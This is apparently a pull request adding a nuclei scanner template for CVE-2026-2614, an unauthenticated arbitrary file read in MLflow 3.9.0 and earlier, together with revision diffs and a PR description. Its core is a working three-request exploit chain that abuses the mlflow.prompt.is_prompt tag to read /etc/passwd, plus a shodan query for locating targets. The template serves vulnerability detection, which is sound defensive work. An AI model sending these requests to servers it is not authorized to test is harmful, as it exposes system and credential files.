### PR TITLE
Add CVE-2026-2614: MLflow <= 3.9.0 unauthenticated arbitrary file read

### DIFF
--- a/http/cves/2026/CVE-2026-2614.yaml
+++ b/http/cves/2026/CVE-2026-2614.yaml
@@ -1,0 +1,64 @@
+id: CVE-2026-2614
+
+info:
+  name: MLflow <= 3.9.0 - Unauthenticated Arbitrary File Read (Prompt Source Validation Bypass)
+  author: str4k3r
+  severity: high
+  description: |
+    MLflow through 3.9.0 allows an unauthenticated attacker to read arbitrary files
+    from the tracking-server filesystem. The `_create_model_version()` handler skips
+    source-path validation entirely when the request carries the
+    `mlflow.prompt.is_prompt` tag, letting an attacker register a model version whose
+    source is a local path (e.g. `file:///etc/`). The model-version artifact endpoint
+    then serves files relative to that source, disclosing arbitrary files such as
+    /etc/passwd and configuration files with credentials. Fixed in 3.10.0, which
+    rejects local/`file://` sources for prompt model versions.
+  reference:
+    - https://github.com/mlflow/mlflow/security/advisories
+    - https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
+    - https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-2614
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-2614
+    cwe-id: CWE-22
+  metadata:
+    max-request: 3
+    verified: true
+    vendor: mlflow
+    product: mlflow
+    shodan-query: title:"MLflow"
+  tags: cve,cve2026,mlflow,lfi,fileread,unauth,traversal
+
+variables:
+  model: "{{to_lower(rand_base(10))}}"
+
+http:
+  - raw:
+      - |
+        POST /api/2.0/mlflow/registered-models/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"{{model}}"}
+      - |
+        POST /api/2.0/mlflow/model-versions/create HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"name":"{{model}}","source":"file:///etc/","tags":[{"key":"mlflow.prompt.is_prompt","value":"true"}]}
+      - |
+        GET /model-versions/get-artifact?name={{model}}&version=1&path=passwd HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-2614.yaml
+++ b/http/cves/2026/CVE-2026-2614.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-2614
 
 info:
-  name: MLflow <= 3.9.0 - Unauthenticated Arbitrary File Read
+  name: MLflow <= 3.9.0 - Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
@@ -26,7 +26,7 @@ info:
     vendor: mlflow
     product: mlflow
     shodan-query: title:"MLflow"
-  tags: cve,cve2026,mlflow,lfi,traversal,unauth
+  tags: cve,cve2026,mlflow,lfi,traversal
 
 variables:
   model: "{{to_lower(rand_base(10))}}"

--- a/http/cves/2026/CVE-2026-2614.yaml
+++ b/http/cves/2026/CVE-2026-2614.yaml
@@ -1,18 +1,15 @@
 id: CVE-2026-2614
 
 info:
-  name: MLflow <= 3.9.0 - Unauthenticated Arbitrary File Read (Prompt Source Validation Bypass)
+  name: MLflow <= 3.9.0 - Unauthenticated Arbitrary File Read
   author: str4k3r
   severity: high
   description: |
-    MLflow through 3.9.0 allows an unauthenticated attacker to read arbitrary files
-    from the tracking-server filesystem. The `_create_model_version()` handler skips
-    source-path validation entirely when the request carries the
-    `mlflow.prompt.is_prompt` tag, letting an attacker register a model version whose
-    source is a local path (e.g. `file:///etc/`). The model-version artifact endpoint
-    then serves files relative to that source, disclosing arbitrary files such as
-    /etc/passwd and configuration files with credentials. Fixed in 3.10.0, which
-    rejects local/`file://` sources for prompt model versions.
+    mlflow mlflow <= 3.9.0 contains a path traversal caused by bypassing source path validation via the mlflow.prompt.is_prompt tag in CreateModelVersion request, letting unauthenticated remote attackers read arbitrary files.
+  impact: |
+    Unauthenticated attackers can read arbitrary files on the server, leading to complete confidentiality compromise.
+  remediation: |
+    Upgrade to version 3.10.0 or later.
   reference:
     - https://github.com/mlflow/mlflow/security/advisories
     - https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
@@ -29,7 +26,7 @@ info:
     vendor: mlflow
     product: mlflow
     shodan-query: title:"MLflow"
-  tags: cve,cve2026,mlflow,lfi,fileread,unauth,traversal
+  tags: cve,cve2026,mlflow,lfi,traversal,unauth
 
 variables:
   model: "{{to_lower(rand_base(10))}}"
@@ -42,12 +39,14 @@ http:
         Content-Type: application/json
 
         {"name":"{{model}}"}
+
       - |
         POST /api/2.0/mlflow/model-versions/create HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/json
 
         {"name":"{{model}}","source":"file:///etc/","tags":[{"key":"mlflow.prompt.is_prompt","value":"true"}]}
+
       - |
         GET /model-versions/get-artifact?name={{model}}&version=1&path=passwd HTTP/1.1
         Host: {{Hostname}}


### PR DESCRIPTION
### CVE-2026-2614 — MLflow <= 3.9.0 Unauthenticated Arbitrary File Read

**Summary.** MLflow's `_create_model_version()` handler skips source-path validation
entirely when a request carries the `mlflow.prompt.is_prompt` tag. An unauthenticated
attacker can register a model version whose `source` is a local path
(`file:///etc/`); the model-version artifact endpoint then serves files relative to
that source, disclosing arbitrary files (e.g. `/etc/passwd`, config files with
credentials). Fixed in 3.10.0, which rejects local/`file://` sources for prompt
model versions. MLflow has no authentication by default.

**Detection (3 requests).**
1. `POST /api/2.0/mlflow/registered-models/create` — create a registered model.
2. `POST /api/2.0/mlflow/model-versions/create` with the `mlflow.prompt.is_prompt`
   tag and `source":"file:///etc/"` — accepted on <=3.9.0, rejected with HTTP 400
   "Invalid prompt source" on 3.10.0+.
3. `GET /model-versions/get-artifact?name=...&version=1&path=passwd` — returns the
   contents of `/etc/passwd`.

Matcher keys on `root:.*:0:0:` + status 200, self-contained (no OOB).

**Validation.** Verified against real deployments (pip `mlflow==3.9.0` vs
`mlflow==3.10.0`, sqlite-backed registry) with the current nuclei engine: fires 3/3
on 3.9.0, silent 3/3 on 3.10.0. `nuclei -validate` passes.

**References**
- https://nvd.nist.gov/vuln/detail/CVE-2026-2614
- https://github.com/mlflow/mlflow/commit/6e801f4259d96804c73107315b24cef0f6aa115a
- https://huntr.com/bounties/19380271-3fbf-4beb-987e-6fd7069c55e6